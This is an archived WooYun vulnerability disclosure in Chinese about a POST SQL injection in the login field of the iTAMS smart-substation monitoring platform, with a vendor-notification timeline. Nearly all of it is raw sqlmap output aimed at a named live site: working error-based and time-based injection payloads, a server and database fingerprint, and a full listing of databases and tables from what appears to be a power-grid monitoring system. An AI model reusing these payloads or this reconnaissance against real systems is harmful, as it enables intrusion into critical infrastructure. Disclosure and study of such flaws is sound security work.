乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-03-05: 细节已通知厂商并且等待厂商处理中 2015-03-10: 厂商已经确认,细节仅向厂商公开 2015-03-20: 细节向核心白帽子及相关领域专家公开 2015-03-30: 细节向普通白帽子公开 2015-04-09: 细节向实习白帽子公开 2015-04-20: 细节向公众公开
rt
iTAMS智能变电站监控平台http://itams.com.cn/登录框txtUserName存在post注入。
sqlmap identified the following injection points with a total of 255 HTTP(s) requests:---Parameter: txtUserName (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: MySQL 5.1sqlmap identified the following injection points with a total of 0 HTTP(s) requests:---Parameter: txtUserName (POST) Type: error-based Title: MySQL >= 5.1 AND error-based - WHERE or HAVING clause (EXTRACTVALUE) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND EXTRACTVALUE(6496,CONCAT(0x5c,0x71767a7171,(SELECT (CASE WHEN (6496=6496) THEN 1 ELSE 0 END)),0x716b706b71)) AND 'fHDd'='fHDd&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0 Type: AND/OR time-based blind Title: MySQL < 5.0.12 AND time-based blind (heavy query) Payload: __EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUJMTkyMTY5NDMzD2QWAgIDD2QWAgIHDw8WAh4EVGV4dAUdKiDnlKjmiLflkI3miJblr4bnoIHplJnor6/vvIFkZBgBBR5fX0NvbnRyb2xzUmVxdWlyZVBvc3RCYWNrS2V5X18WAQUJaWJ0bkxvZ2luYGDRlB0xmoOBOJhlSqh1PTCfgeeFQ2gDUw/B4gklff8=&__EVENTVALIDATION=/wEWBALtie2XBgKl1bKzCQK1qbSWCwKBo5SvBSRwYSxRTT+Q99Y5PNJ45sTz5MZbRaOb6/C0jaB7TGAA&txtUserName=admin' AND 8737=BENCHMARK(5000000,MD5(0x50494841)) AND 'tWfU'='tWfU&txtPassWord=123456&ibtnLogin.x=0&ibtnLogin.y=0---web server operating system: Windows 2008 R2 or 7web application technology: ASP.NET, ASP.NET 4.0.30319, Microsoft IIS 7.5back-end DBMS: MySQL 5.1Database: tlms[31 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || weatherdata || windageyawdata |+----------------------------+Database: beijing[33 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || videoequip || videorel || weatherdata || windageyawdata |+----------------------------+Database: 11ta[33 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || videoequip || videorel || weatherdata || windageyawdata |+----------------------------+Database: wuhantlms[33 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || videoequip || videorel || weatherdata || windageyawdata |+----------------------------+Database: performance_schema[46 tables]+----------------------------+| accounts || cond_instances || events_stages_current || events_stages_history || events_stages_history_long || events_stages_summary_by_a || events_stages_summary_by_h || events_stages_summary_by_t || events_stages_summary_by_u || events_stages_summary_glob || events_statements_currentq || events_statements_history_ || events_statements_historyq || events_statements_summary_ || events_waits_current || events_waits_history || events_waits_history_longq || events_waits_summary_by_ac || events_waits_summary_by_ho || events_waits_summary_by_in || events_waits_summary_by_th || events_waits_summary_by_us || events_waits_summary_globa || file_instances || file_summary_by_event_name || file_summary_by_instance || host_cache || hosts || mutex_instances || objects_summary_global_by_ || performance_timers || rwlock_instances || session_account_connect_at || session_connect_attrs || setup_actors || setup_consumers || setup_instruments || setup_objects || setup_timers || socket_instances || socket_summary_by_event_na || socket_summary_by_instance || table_io_waits_summary_by_ || table_lock_waits_summary_b || threads || users |+----------------------------+Database: tlms-beijing[31 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || weatherdata || windageyawdata |+----------------------------+Database: mysql[41 tables]+----------------------------+| user || akbstf || columns_priv || db || ekdbqk || event || fikkag || func || general_log || help_category || help_keyword || help_relation || help_topic || innodb_index_stats || innodb_table_stats || iwwoig || kxtsom || ndb_binlog_index || oaigce || plugin || proc || procs_priv || proxies_priv || pvsouh || servers || sjbwda || slave_master_info || slave_relay_log_info || slave_worker_info || slow_log || tables_priv || tempmix4 || time_zone || time_zone_leap_second || time_zone_name || time_zone_transition || time_zone_transition_typeq || vaaxvz || vricta || vuecev || xrnliz |+----------------------------+Database: tlms-test[31 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || weatherdata || windageyawdata |+----------------------------+Database: itams1.3[42 tables]+----------------------------+| cfgequipment || cfghouse || cfgport || cfgrfidreader || cfgrfidtag || cfgsamplerunit || cfgsignal || cfgstation || cfgstreamsrv || cfgvideo || cfgvideorel || cfgvideosrv || cfgworkstation || clerktype || controlqueue || doorctlunitevents || doorctlunitoperate || hisalarmdata || hiscontrolqueue || hisdata || manaclerk || manaoperaterecord || manaservice || manaset || oscondctrl || osdevstatecond || oslevel || ospicture || ossignal || ostype || osuserpower || osvideo || rfidrecd || runalarmmsge || stationworkers || stdclass || stdcondition || stdmsge || stdpart || stdsampler || stdtype || workersdoorcard |+----------------------------+Database: sh[33 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || videoequip || videorel || weatherdata || windageyawdata |+----------------------------+Database: shanghai[31 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || weatherdata || windageyawdata |+----------------------------+Database: sakila[23 tables]+----------------------------+| language || actor || actor_info || address || category || city || country || customer || customer_list || film || film_actor || film_category || film_list || film_text || inventory || nicer_but_slower_film_list || payment || rental || sales_by_film_category || sales_by_store || staff || staff_list || store |+----------------------------+Database: information_schema[59 tables]+----------------------------+| CHARACTER_SETS || COLLATIONS || COLLATION_CHARACTER_SET_AP || COLUMNS || COLUMN_PRIVILEGES || ENGINES || EVENTS || FILES || GLOBAL_STATUS || GLOBAL_VARIABLES || INNODB_BUFFER_PAGE || INNODB_BUFFER_PAGE_LRU || INNODB_BUFFER_POOL_STATS || INNODB_CMP || INNODB_CMPMEM || INNODB_CMPMEM_RESET || INNODB_CMP_PER_INDEX || INNODB_CMP_PER_INDEX_RESET || INNODB_CMP_RESET || INNODB_FT_BEING_DELETED || INNODB_FT_CONFIG || INNODB_FT_DEFAULT_STOPWORD || INNODB_FT_DELETED || INNODB_FT_INDEX_CACHE || INNODB_FT_INDEX_TABLE || INNODB_LOCKS || INNODB_LOCK_WAITS || INNODB_METRICS || INNODB_SYS_COLUMNS || INNODB_SYS_DATAFILES || INNODB_SYS_FIELDS || INNODB_SYS_FOREIGN || INNODB_SYS_FOREIGN_COLS || INNODB_SYS_INDEXES || INNODB_SYS_TABLES || INNODB_SYS_TABLESPACES || INNODB_SYS_TABLESTATS || INNODB_TRX || KEY_COLUMN_USAGE || OPTIMIZER_TRACE || PARAMETERS || PARTITIONS || PLUGINS || PROCESSLIST || PROFILING || REFERENTIAL_CONSTRAINTS || ROUTINES || SCHEMATA || SCHEMA_PRIVILEGES || SESSION_STATUS || SESSION_VARIABLES || STATISTICS || TABLES || TABLESPACES || TABLE_CONSTRAINTS || TABLE_PRIVILEGES || TRIGGERS || USER_PRIVILEGES || VIEWS |+----------------------------+Database: 1.1[33 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || videoequip || videorel || weatherdata || windageyawdata |+----------------------------+Database: world[3 tables]+----------------------------+| city || country || countrylanguage |+----------------------------+Database: hndnms[54 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hd_device_cam || hd_device_group || hd_device_group_detail || hd_device_ioport || hd_device_route || hd_log_alarm || hd_log_event || hd_log_sys || hd_log_upgrade || hd_map || hd_map_element || hd_ptz_cruise || hd_ptz_preset || hd_r_role || hd_r_user || hd_res_depart || hd_res_device || hd_res_right || hd_res_server || hd_res_type || hd_strategy_info || hd_vendor || hd_vendor_product || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || weatherdata || windageyawdata |+----------------------------+Database: shanghai-tlms[33 tables]+----------------------------+| alarmevents || cameradata || curcameradata || curswaypathdata || curvibrationcurvedata || dirtinessdata || equipmentstate || hisalarmevents || hisequipmentstate || icingdata || lmequip || lmgroup || lmline || lmsignal || lmtype || ltemperaturedata || manaoperaterecord || oslevel || ospicture || ossignal || ostype || runsigdata || sagdata || swaydata || swaypathdata || towerleandata || userinfo || vibrationcurvedata || vibrationdata || videoequip || videorel || weatherdata || windageyawdata |+----------------------------+
联系厂商
危害等级:高
漏洞Rank:12
确认时间:2015-03-10 13:08
暂无